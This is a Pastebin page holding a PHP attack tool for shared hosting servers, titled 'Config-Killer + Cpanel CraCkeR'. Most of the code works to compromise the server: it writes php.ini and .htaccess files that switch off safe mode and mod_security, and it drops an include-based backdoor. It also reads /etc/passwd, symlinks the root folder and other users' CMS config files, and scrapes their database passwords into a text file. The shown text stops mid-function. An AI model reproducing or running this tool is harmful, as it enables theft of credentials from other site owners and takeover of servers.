Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $head = '
- <html>
- <head>
- </script>
- <STYLE>
- body {
- font-family: Tahoma
- }
- tr {
- BORDER: dashed 1px #00ff00;
- color: #00ff00;
- }
- td {
- BORDER: dashed 1px #00ff00;
- color: #00ff00;
- }
- .table1 {
- BORDER: 0px Black;
- BACKGROUND-COLOR: Black;
- color: #00ff00;
- }
- .td1 {
- BORDER: 0px;
- BORDER-COLOR: #00ff00;
- font: 7pt Verdana;
- color: Green;
- }
- .tr1 {
- BORDER: 0px;
- BORDER-COLOR: #00ff00;
- color: #00ff00;
- }
- table {
- BORDER: dashed 1px #00ff00;
- BORDER-COLOR: #00ff00;
- BACKGROUND-COLOR: Black;
- color: #00ff00;
- }
- input {
- border : solid 3px ;
- border-color : #00ff00;
- BACKGROUND-COLOR: white;
- font: 11pt Verdana;
- color: #00ff00;
- }
- select {
- BORDER-RIGHT: Black 1px solid;
- BORDER-TOP: #00ff00 1px solid;
- BORDER-LEFT: #00ff00 1px solid;
- BORDER-BOTTOM: Black 1px solid;
- BORDER-color: #00ff00;
- BACKGROUND-COLOR: Black;
- font: 8pt Verdana;
- color: Red;
- }
- submit {
- BORDER: buttonhighlight 2px outset;
- BACKGROUND-COLOR: Black;
- width: 30%;
- color: #00ff00;
- }
- textarea {
- border : dashed 1px #00ff00;
- BACKGROUND-COLOR: Black;
- font: Fixedsys bold;
- color: #00ff00;
- }
- BODY {
- SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #00ff00; SCROLLBAR-SHADOW-color: #00ff00; SCROLLBAR-3DLIGHT-color: #00ff00; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #00ff00; SCROLLBAR-DARKSHADOW-color: #00ff00
- margin: 1px;
- color: Red;
- background-color: Black;
- }
- .main {
- margin : -287px 0px 0px -490px;
- BORDER: dashed 1px #00ff00;
- BORDER-COLOR: #00ff00;
- }
- .tt {
- background-color: Black;
- }
- A:link {
- COLOR: White; TEXT-DECORATION: none
- }
- A:visited {
- COLOR: White; TEXT-DECORATION: none
- }
- A:hover {
- color: Red; TEXT-DECORATION: none
- }
- A:active {
- color: Red; TEXT-DECORATION: none
- }
- </STYLE>
- <script language=\'javascript\'>
- function hide_div(id)
- {
- document.getElementById(id).style.display = \'none\';
- document.cookie=id+\'=0;\';
- }
- function show_div(id)
- {
- document.getElementById(id).style.display = \'block\';
- document.cookie=id+\'=1;\';
- }
- function change_divst(id)
- {
- if (document.getElementById(id).style.display == \'none\')
- show_div(id);
- else
- hide_div(id);
- }
- </script>'; ?>
- <html>
- <title>Config-Killer + Cpanel CraCkeR</title>
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
- <p align="center">
- <img border="0" src="http://www.alm3refh.com/images/groupxp.gif" width="426" height="169"></p>
- <head>
- <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
- <form method=post><font color=white size=2 face="comic sans ms">KICK SAFE MODE</font><br>
- <input type=submit name=ini value="Generate PHP.ini / ini.php / .htaccess" /></form>
- <?php
- if(isset($_POST['ini']))
- {
- $yamini=fopen('php.ini','w+') or die("can't open file");
- $rr=" safe_mode=Off\n short_open_tag = On\n log_errors = On\n log_errors_max_len = 1024\n ignore_repeated_errors = On\n magic_quotes_runtime = Off\n magic_quotes_gpc = On\n AddHandler application/x-httpd-php4 .php\n display_errors = Off\n disable_functions=Bypassed_By_Yamraaj-IHOS\n safe_mode_gid=Off\n open_basedir=Off\n register_globals=on\n exec=On\n shell_exec=On\n allow_url_fopen=On ";
- fwrite($yamini,$rr);
- $yamhtm = fopen("ihos.html", "w+") or die("can't open file");
- fwrite($yamhtm, "<title>404 Not Found</title>\n");
- $yamhtm1 = fopen("group.html", "w+") or die("can't open file");
- fwrite($yamhtm1, "<body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle your fucking request lol.</p><iframe src=\"ip.php\" title=\"404 not found\" width=\"10\" height=\"10\" style=\"visibility:hidden;position:absolute;left:0;top:0;\"></iframe></body>\n");
- $yamht = fopen(".htaccess", "w+");
- fwrite($yamht, "#[YAM] here ..go FUCK your self
- Options +Indexes
- DirectoryIndex yam.html
- IndexIgnore ini.php ihos.html group.html
- ErrorDocument 404 /group.html
- RedirectMatch 404 ^/maachodporkies/.*$
- IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
- HeaderName ihos.html
- ReadmeName group.html
- <IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- </IfModule>\n\r");
- $yaminiphp = fopen("ini.php", "w+");
- fwrite($yaminiphp, "<?
- echo ini_get(\"safe_mode\");
- echo ini_get(\"open_basedir\");
- include(\$_GET[\"file\"]);
- ini_restore(\"safe_mode\");
- ini_restore(\"open_basedir\");
- echo ini_get(\"safe_mode\");
- echo ini_get(\"open_basedir\");
- include(\$_GET[\"ss\"]);
- ?>");
- $link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to view PHP.INI</u></font></a>";
- echo $link;
- }
- ?>
- <div align=center><table width=100% border=1><tr><td align=center></td></tr></table>
- <form method=post>
- <font color=white size=2 face="comic sans ms">MANUAL SYMLINK<br><input type=submit name=man value="Open Manual symlink form"><p></form>
- <?php
- if(isset($_POST['man']))
- {
- ?>
- <form method=post>file link that you want symlink:-<input type=text name=dli value="/home/user/public_html/config.php">  file name with which you want represent symlink :-<input type=text name=fna value="owned.txt"><br>use .txt(owned.txt) or no extension(owned) for file which will represent symlink<br><br><input type=submit name=manual value="maar le >.<"></form>
- <?php
- }
- ?>
- <?php
- error_reporting(0);
- if(isset($_POST['manual']))
- {
- $dlink=trim($_POST['dli']);
- $fna=trim($_POST['fna']);
- mkdir('group',0777);
- $rr = "Options Indexes FollowSymLinks\nOptions all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $g = fopen('group/.htaccess','w');
- fwrite($g,$rr);
- $final="group/".$fna;
- symlink($dlink,$final);
- echo "<br>bhaiyu maine ".$dlink." ko jahaan symlink kiya, uska link==> <a href=".$final."><font color=red size=3>is here</font></a>";
- }
- ?><p><div align=center><table width=100% border=1><tr><td align=center></td></tr></table>
- <form method=post>
- <font color=white size=3 face="comic sans ms">406 error bypasser on public_html folder <br><input type=submit name=4 value="ghuma de billu x-("><p></form>
- <?php
- if(isset($_POST['4']))
- {
- mkdir('group.ihos',0777);
- $rr = "<body bgcolor=black><center><font color=white size=2 > SANIYA KI BARAT ME AAYA HAI KYA </font><br><img src='http://www.alm3refh.com/images/groupxp.gif'>";
- $g = fopen('group.ihos/index.html','w');
- fwrite($g,$rr);
- $r="group.ihos/";
- $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode(":",$user);
- $us=$str[0];
- }
- echo '<br>bhaiyu check this directory for all symlinked users public_html directory with 406 error bypassed ==> <a href="group.ihos/"><font color=red size=4><u>group.ihos</u></font></a>';
- }
- ?>
- <p><div align=center><table width=100% border=1><tr><td align=center></td></tr></table>
- <font color=white size=2 face="comic sans ms">Automated mass symlink wala jugaad </font><br><font color=white size=2 face="comic sans ms"> Root dir aur configs toh free hai </font><br><font color=white size=2 face="comic sans ms"> Server me jitna shell hai wo bhi dikhayega</font>
- <form method=post>
- <input type=submit name="usre" value="use to Extract usernames" /></form>
- <?php
- if(isset($_POST['usre'])){
- ?><form method=post>
- <textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode(":",$user);
- echo $str[0]."\n";
- }
- ?></textarea><br><br>
- <input type=submit name=su value="bhaiyu ^_^ .. lets start" /></form>
- <?php } ?>
- <?php
- error_reporting(0);
- echo "<font color=red size=2 face=\"comic sans ms\">";
- if(isset($_POST['su']))
- {
- mkdir('group.txt',0777);
- $rr = "Options Indexes FollowSymLinks\nOptions all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $g = fopen('group.txt/.htaccess','w');
- fwrite($g,$rr);
- $groupshell = symlink("/","group.txt/root");
- $rt="<a href=group.txt/root><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
- echo "check link given below for / folder symlink <br><u>$rt</u>";
- $dir=mkdir('group.shell',0777);
- $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \nIndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble \n Require None \n Satisfy Any";
- $f = fopen('group.shell/.htaccess','w');
- fwrite($f,$r);
- $consym="<a href=group.shell/><font color=white size=3 face=\"comic sans ms\">shells & defaces</font></a>";
- echo "<br>shell and deface by other hackers in whole server <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
- $usr=explode("\n",$_POST['user']);
- $configuration=array("adminfinder.php","AK-74.php","Ani-Shell.php","antichat.php","ASP.php","aspx.php","auto.php","ayyildiz.php","aZRaiLPhp.php","backupsql.php","c0derz.php","CasuS.php","cihshell.php","CTT.php","CWShellDumper.php","CyberSpy5.php","d3v1l5c4f3.php","dbman.php","dC3.php","dq.php","Dx.php","DxShell.php","EFSO.php","eg.php","ekin0x.php","elmaliseker.php","Evilc0der.php","fso.php","ftp.php","gamma.php","GFS.php","gfs_sh.php","go-shell.php","h4ntu.php","hackrich.php","hiddens.php","ida.php","if.php","image.php","iMHaBiRLiGi.php","iMHaPFtp.php","indexer.php","ironshell.php","KA.php","kacak.php","kayredmoon.php","klasvayv.php","lamashell.php","liz0zim.php","load_shell.php","Loaderz.php","localhost.php","log.php","login.php","Macker.php","madspot_shell.php","matamu.php","me64.php","MGZ.php","Miller.php","MyShell.php","mysql.php","MYSql.php","mysql_tool.php","mysqlwebsh.php","NCC-Shell.php","Netcat.php","NetworkFileManagerPHP.php","NFM.php","NGH.php","NIX.php","nshell.php","nstview.php","NTDaddy.php","nsuser.php","Oops.php","PHVayv.php","PHANTASMA.php","PHPShell.php","php.php","php-backdoor.php","php-include-w-shell.php","pHpINJ.php","PHPJackal.php","phpRemoteView.php","PhpSpy.php","PHVayv.php","PostShell.php","Predator.php","Private-i3lue.php","PRiV8.php","pws.php","r00t.php","reader.php","redcod.php","RemExp.php","remview_fix.php","rootshell.php","ru24_post_sh.php","s72.php","Safe_Mode.php","safe0ver.php","saudi_sh3ll.php","send.php","ShAnKaR.php","simattacker.php","simple_cmd.php","simple-backdoor.php","SimShell.php","Sincap.php","sa_3.php","SnIpEr_Sa.php","sosyete.php","South.php","sql.php","STNC.php","symlink_urduhack.php","t5.php","tero.php","thebaron.php","tryag.php","up.php","urduhack.php","Uploader.php","vb.php","web-shell.php","WinX.php","wso_shell.php","wso2.php","zacosmall.php","zehir4.asp","zehir4.php","ZyklonShell.php","c99.php","c100.php","r57.php","b374k.php","c22.php","symlink_sa.php","webr00t.php","cpanel.php","wso.php","404.php","aarya.php","greenshell.php","ddos.php","madspot.php","1337.php","31337.php","WSO.php","bc.php","cpn.php","sh3ll.php","dz0.php","whcms.php","gaza.php","d0mains.php","changeall.php","h4x0r.php","L3b.php","uploads.php","cmd.php","shell.asp","cmd.asp","sh3ll.asp","b374k-2.2.php","m1n1.php","b374km1n1.php","MCA.php","madspoit.php","error_log.php","error_logs.php","error.php","madz.php","mad.php","mad2.php","4041.php","D.php","anon.php",".mm.php","hacking Sec.php","s3.php","anonymous.php","Ch3rn0by1.php","strt123.php","madspotshell.php","sh3lla.php","priv8.php","private.php","cp.php","x.php",".php","cpbrute.php","hacked.php","wso24.php","wso26.php","wso404.php","sym.php","symsa2.php","sym3.php","sym4.php","whmcs.php","um3rh.php","whmcskiller.php","cracker.php","1.php","2.php","database.php","a.php","d.php","dz.php","system.php","um3r.php","zone-h.php","root.php","loveajkal.php","doom.php","dam.php","killer.php","user.php","sh3ll3d.php","uploader.php","xd.php","d00.php","h4xor.php","kinoz.php","TTzone.php","pak.php","w.php","dom.php","d.php","oops.php?","web.php","spider.php","upload.php","shelled.php","sh3lled.php","pce.php","PCE.php","3.php","sym1.php","pakshell.php","saz.php","myc99.php","bca.php","mca.php","wellcome.php","Symlink.php","symlink.php","domains.php","cpbt.php","jowp.php","B-F.php","lol.php","hack.php","dhan.php","dhanush.php","php.ini","ini.php","wss.php","dk.php","Log.php","legal.php","I-47.php","merashell.php","b.php","insta!l.php","xx.php","box.php","b0x.php","jinx.php","asd.php","TCS.php","tcs.php","team.php","love.php","webadmin.php","devil.php","UChaNK.php","sst.php","dh.php","black.php","404en.php","angel.php","m4d.php","symsa3.php","unlimit-sym.php","403.php","haxor.php","Symlink_Sa3.php","immi.php","thsh3ll.php","SM()K3RZ!.php","mcs.php","ck.php","dmass.php","class.php","wpm.php","codacker.php","data.php",".12345.php","confkiller.php","wp-bt.php","haxseeker.php","wso_immi.php","helix.php","akky.php","yele.php","mc.php","db.php","Webr00t.php","mad_immi.php","immi_sa.php","GX.php","upload.phtml","whm.php","whm1.php","whmfckr.php","whmkiller.php","BNT Shell.php","BNTShell.php","BNT.php","bnt.php","cok.php","inject.php","injection.php","Xinject.php","x0rg-Bypass.php","cgi.php","Crystal.php","FSO.php","gfs.php","lama.php","massdeface.php","mass.php","k.php","kk.php","bp.php","bypass.php","cp.php","cpanel.php","domains.php","don3.php","ep.php","etx.php","ftp.php","hulk.php","groupshell.php","inx.php","killer3.php","mannu.php","mannu1.php","mannumod.php","modebp.php","no.php","rr.php","rr2.php","symkiller.php","ts.php","ts1.php","tttt.php","w.php","w2.php","cof.pl","cgishell.pl","allsoft.pl","user.pl","config.pl","MCA.html","ittihad.html","x.html","y.html","3xp1r3.html","deface.html","defaced.html","AlphaCop.html","mca.html","Tcs.html","root.html","r00t.html","lol.html","pce.html","pce.html","bca.html","y.htm","x.htm","3xp1r3.htm","x.txt","COOKIE.txt","wp.txt","joomla.txt","passwd.txt","named.txt","login.txt","password.txt","ftp.txt");
- foreach($usr as $uss )
- {
- $us=trim($uss);
- foreach($configuration as $c)
- {
- $rs="/home/".$us."/public_html/".$c;
- $r="group.shell/".$us." .. ".$c;
- symlink($rs,$r);
- }
- }
- $dir=mkdir('group.conf',0777);
- $r = "Options Indexes FollowSymLinks\nOptions all \n DirectoryIndex group.html \n Require None \n Satisfy Any";
- $f = fopen('group.conf/.htaccess','w');
- fwrite($f,$r);
- $consym="<a href=group.conf/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
- echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
- $usr=explode("\n",$_POST['user']);
- foreach($usr as $uss )
- {
- $us=trim($uss);
- $r="group.conf/";
- symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
- symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
- symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
- symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
- symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
- symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomlablog');
- symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
- symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
- symlink('/home/'.$us.'/public_html/forum/includes/config.php',$r.$us.'..vbforum');
- symlink('/home/'.$us.'/public_html/cc/includes/config.php',$r.$us.'..vbcc');
- symlink('/home/'.$us.'/public_html/connect.php',$r.$us.'..connect');
- symlink('/home/'.$us.'/public_html/mk_conf.php',$r.$us.'..mk-portale1');
- symlink('/home/'.$us.'/public_html/include/config.php',$r.$us.'..Marketecture');
- symlink('/home/'.$us.'/public_html/includes/functions.php',$r.$us.'..phpbb3');
- symlink('/home/'.$us.'/public_html/include/db.php',$r.$us.'..infinity');
- symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..invisio');
- symlink('/home/'.$us.'/public_html/forum/conf_global.php',$r.$us.'..forumconfglobal');
- symlink('/home/'.$us.'/public_html/forums/conf_global.php',$r.$us.'..forumsconf_global');
- symlink('/home/'.$us.'/public_html/forums/config.php',$r.$us.'..forumsconfig');
- symlink('/home/'.$us.'/public_html/forum/config.php',$r.$us.'..forumconfig');
- symlink('/home/'.$us.'/public_html/includes/sql.php',$r.$us.'..InculdeSql');
- symlink('/home/'.$us.'/public_html/lib/config.php',$r.$us.'..LibConfig');
- symlink('/home/'.$us.'/public_html/lib/db.php',$r.$us.'..LibDb');
- symlink('/home/'.$us.'/public_html/db.php',$r.$us.'..Db');
- symlink('/home/'.$us.'/public_html/shop/config.php',$r.$us.'..ShopConfig');
- symlink('/home/'.$us.'/public_html/dbconnect.php',$r.$us.'..dbconnect');
- symlink('/home/'.$us.'/public_html/dbc.php',$r.$us.'..dbc');
- symlink('/home/'.$us.'/public_html/includes/dbc.php',$r.$us.'..Includedbc');
- symlink('/home/'.$us.'/public_html/includes/dbconnect.php',$r.$us.'..Includedbconnect');
- symlink('/home/'.$us.'/public_html/admincp/config.inc',$r.$us.'..config.inc');
- symlink('/home/'.$us.'/public_html/mycp/config/functions/db.php',$r.$us.'..mycpDb');
- symlink('/home/'.$us.'/public_html/include/connection.php',$r.$us.'..connection');
- symlink('/home/'.$us.'/public_html/webpanel/config.inc.php',$r.$us.'..WebpanelConfigInc');
- symlink('/home/'.$us.'/public_html/include/config.inc.php',$r.$us.'..CopperminePhotoGallery');
- symlink('/home/'.$us.'/public_html/conf/_basic_config.php',$r.$us.'..B2Evolution');
- symlink('/home/'.$us.'/public_html/inc/header.inc.php',$r.$us.'..BoonexDolphin');
- symlink('/home/'.$us.'/public_html/config/site.php',$r.$us.'..Concrete5CS');
- symlink('/home/'.$us.'/public_html/site/config.php',$r.$us.'..Concrete5SC');
- symlink('/home/'.$us.'/public_html/includes/global.inc.php',$r.$us.'..CubeCart');
- symlink('/home/'.$us.'/public_html/e107_config.php',$r.$us.'..e107');
- symlink('/home/'.$us.'/public_html/faq_config.php',$r.$us.'..FAQMasterFlex');
- symlink('/home/'.$us.'/public_html/db-config.php',$r.$us.'..GeeklogDBC');
- symlink('/home/'.$us.'/public_html/siteconfig.php',$r.$us.'..GeeklogSiteC');
- symlink('/home/'.$us.'/public_html/lib-common.php',$r.$us.'..GeeklogLibCom');
- symlink('/home/'.$us.'/public_html/private/db-config.php',$r.$us.'..glfusion');
- symlink('/home/'.$us.'/public_html/hotaru_settings.php',$r.$us.'..Hotaru');
- symlink('/home/'.$us.'/public_html/livesite/config.php',$r.$us.'..LiveSite');
- symlink('/home/'.$us.'/public_html/config/config.properties.php',$r.$us.'..LifeType');
- symlink('/home/'.$us.'/public_html/app/etc/local.xml',$r.$us.'..Magento');
- symlink('/home/'.$us.'/public_html/manager/includes/config.inc.php',$r.$us.'..MODx');
- symlink('/home/'.$us.'/public_html/app/config.php',$r.$us.'..NoahsClassifieds');
- symlink('/home/'.$us.'/public_html/info.php',$r.$us.'..ocPortal');
- symlink('/home/'.$us.'/public_html/ow_includes/config.php',$r.$us.'..Oxwall');
- symlink('/home/'.$us.'/public_html/mysql.class.php',$r.$us.'..phpFormGenerator');
- symlink('/home/'.$us.'/public_html/mysql.php',$r.$us.'..phpFormGenerator');
- symlink('/home/'.$us.'/public_html/mysql-db.php',$r.$us.'..phpFormGenerator');
- symlink('/home/'.$us.'/public_html/config/config.php',$r.$us.'..PHPlist');
- symlink('/home/'.$us.'/public_html/defaults.php',$r.$us.'..phpMyDirectory');
- symlink('/home/'.$us.'/public_html/include/inc_conf/conf.inc.php',$r.$us.'..phpWCMS');
- symlink('/home/'.$us.'/public_html/conf/config.php',$r.$us.'..phpWebSite');
- symlink('/home/'.$us.'/public_html/lib/config.php',$r.$us.'..PhpWikiLibcon');
- symlink('/home/'.$us.'/public_html/libs/dbconnect.php',$r.$us.'..Pligg');
- symlink('/home/'.$us.'/public_html/config/dbconnect.php',$r.$us.'..ConfigDbconnect');
- symlink('/home/'.$us.'/public_html/sohoadmin/config/isp.conf.php',$r.$us.'..Soholaunch');
- symlink('/home/'.$us.'/public_html/textpattern/config.php',$r.$us.'..Textpattern');
- symlink('/home/'.$us.'/public_html/db/local.php',$r.$us.'..TikiWiki');
- symlink('/home/'.$us.'/public_html/typo3conf/localconf.php',$r.$us.'..TYPO3');
- symlink('/home/'.$us.'/public_html/mainfile.php',$r.$us.'..Xoops');
- symlink('/home/'.$us.'/public_html/zp-data/zenphoto.cfg',$r.$us.'..Zen Photo');
- symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..MyBB');
- symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..Phpbb');
- symlink('/home/'.$us.'/public_html/forum/includes/config.php',$r.$us.'..Phpbb-forum');
- symlink('/home/'.$us.'/public_html/forums/includes/config.php',$r.$us.'..Phpbb-forums');
- symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Smf');
- symlink('/home/'.$us.'/public_html/settings.php',$r.$us.'..smf');
- symlink('/home/'.$us.'/public_html/includes/settings.php',$r.$us.'..WebCalendar');
- symlink('/home/'.$us.'/public_html/config/settings.php',$r.$us.'..ConfigSettings');
- symlink('/home/'.$us.'/public_html/config/settings.inc.php',$r.$us.'..PrestaShop');
- symlink('/home/'.$us.'/public_html/forum/Settings.php',$r.$us.'..forumSettings');
- symlink('/home/'.$us.'/public_html/forums/Settings.php',$r.$us.'..forumsSettings');
- symlink('/home/'.$us.'/public_html/site/default/settings.php',$r.$us.'..Drupal');
- symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..Drupals');
- symlink('/home/'.$us.'/public_html/admin/conf.php',$r.$us.'..AdminConf');
- symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..OpenCart');
- symlink('/home/'.$us.'/public_html/admin/includes/configure.php',$r.$us.'..osCommerceAdmin');
- symlink('/home/'.$us.'/public_html/includes/configure.php',$r.$us.'..osCommerce');
- symlink('/home/'.$us.'/public_html/forms/admin/config.inc.php',$r.$us.'..phpFreeChat');
- symlink('/home/'.$us.'/public_html/admin.php',$r.$us.'..PhpWikiAdmin');
- symlink('/home/'.$us.'/public_html/includes/configure.php',$r.$us.'..ShopSite-TomatoCart-ZenCart');
- symlink('/home/'.$us.'/public_html/admin/includes/configure.php',$r.$us.'..ShpSite-TmtCart-ZenCart');
- symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..Whm');
- symlink('/home/'.$us.'/public_html/whmc/configuration.php',$r.$us.'..Whmc');
- symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..Whmc-Supp');
- symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..Whmcs-Cli');
- symlink('/home/'.$us.'/public_html/billings/configuration.php',$r.$us.'..Whmcs-blis');
- symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..Whmcs-bil');
- symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..Whmcs-clis');
- symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..Whmcs-clies');
- symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..Whmcs-clie');
- symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..Whmcs-csup');
- symlink('/home/'.$us.'/public_html/whmcs/WHM/configuration.php',$r.$us.'..Whmcs-WHM');
- symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..Whmc-WHM');
- symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whm-WHMCS');
- symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..whm-whmcs');
- symlink('/home/'.$us.'/public_html/hosting/configuration.php',$r.$us.'..Whm-Hosting');
- symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..Whmcs');
- symlink('/home/'.$us.'/public_html/order/configuration.php',$r.$us.'..Whmcs-Order');
- }
- }
- ?>
- <?php
- //////////////////////////////////////
- /////password grabbing section////////
- //////////////////////////////////////
- ?>
- <form method=post>
- <input type=submit name=select value="khul ja config se password nikalne wala graber ">
- </form>
- <?php
- if(isset($_POST['select']))
- {
- ?><div align=center>
- <font color=#ff9933 size=2 face="comic sans ms">checkmark configuration files, for those you want to grab passwords
- <table width=30% >
- <tr>
- <td align=right width=50%>
- <br>
- <font color=red size=3>
- wordpress => <br>
- joomla => <br>
- whmcs =><br>
- VBulletin => <br>
- unknown => <br>
- ftp(joomla) => <br>
- <br>
- </td>
- <td align=left >
- <form method="post"><br>
- <input type="checkbox" name="config[]" value="wp"><br>
- <input type="checkbox" name="config[]" value="joomla"><br>
- <input type="checkbox" name="config[]" value="whmcs"><br>
- <input type="checkbox" name="config[]" value="vb"><br>
- <input type="checkbox" name="config[]" value="other"><br>
- <input type="checkbox" name="config[]" value="jftp"><br>
- </td>
- </tr>
- </table><br>
- <input type="submit" name=sm value="billu..Hit this server.. hard " />
- </form>
- <p>
- <?php
- }
- ?>
- <?php
- set_time_limit(0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
- {
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[1]);
- $ar=trim($ar1[0]);
- return $ar;
- }
- function data($lu)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $lu);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
- $result['EXE'] = curl_exec($ch);
- curl_close($ch);
- return $result['EXE'];
- }
- if(isset($_POST['sm']))
- {
- ////////////////
- ///file opener//
- ////////////////
- $ffile=fopen('P-list.txt','a+');
- //////////////////////
- //symlink directory///
- //////////////////////
- $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/group.conf/";
- $re=$r;
- ////////////////////////
- ///username extractor///
- ////////////////////////
- if(!empty($_POST['config']))
- {
- $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode(":",$user);
- $usersss=$str[0];
- foreach($_POST['config'] as $check)
- {
- ////////////////
- ///wordpress////
- ////////////////
- if($check == "wp")
- {
- $wpc=array("..wp-config","..word-wp","..wpblog");
- foreach($wpc as $wpcon)
- {
- $finalurl=$re.$usersss.$wpcon;
- $content=data($finalurl);
- if($content && preg_match('/table_prefix/i',$content))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is wordpress </font></td></tr></table>";
- echo "mysql server password ==> ". $dbp=entre2v2($content,"DB_PASSWORD', '","');");
- if(!empty($dbp))
- $pass=$dbp."\n";
- fwrite($ffile,$pass);
- }
- }
- }
- ////////////
- // joomla //
- ////////////
- if($check == "joomla")
- {
- $joomlac=array("..joomla-or-whmcs","..joomla");
- foreach($joomlac as $joomlacon)
- {
- $finalurl=$re.$usersss.$joomlacon;
- $content=data($finalurl);
- if($content && preg_match('/dbprefix/i',$content))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
- echo "mysql server password ==> ". $dbp=entre2v2($content,"password = '","';");
- if(!empty($dbp))
- $pass=$dbp."\n";
- fwrite($ffile,$pass);
- }
- }
- }
- ///////////////
- ////whmcs /////
- ///////////////
- if($check == "whmcs")
- {
- $whmcsc=array("..joomla-or-whmcs","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
- foreach($whmcsc as $whmcscon)
- {
- $finalurl=$re.$usersss.$whmcscon;
- $content=data($finalurl);
- if($content && preg_match('/cc_encryption_hash/i',$content))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website whmcs bhaiyu </font></td></tr></table>";
- echo "mysql server password ==> ". $dbp=entre2v2($content,"db_password = '","';");
- if(!empty($dbp))
- $pass=$dbp."\n";
- fwrite($ffile,$pass);
- }
- }
- }
- /////////////////
- ///VBulletin////
- ////////////////
- if($check == "vb")
- {
- $vbc=array("..vbinc","..vb");
- foreach($vbc as $vbcon)
- {
- $finalurl=$re.$usersss.$vbcon;
- $content=data($finalurl);
- if($content && preg_match('/admincpdir/i',$content))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is vbulletin </font></td></tr></table>";
- echo "mysql server password ==> ". $dbp=entre2v2($content,"password'] = '","';");
- if(!empty($dbp))
- $pass=$dbp."\n";
- fwrite($ffile,$pass);
- }
- }
- }
- /////////////////
- ///joomla ftp////
- ////////////////
- if($check == "jftp")
- {
- $joomlac=array("..joomla-or-whmcs","..joomla");
- foreach($joomlac as $joomlacon)
- {
- $finalurl=$re.$usersss.$joomlacon;
- $content=data($finalurl);
- if($content && preg_match('/dbprefix/i',$content))
- {
- echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
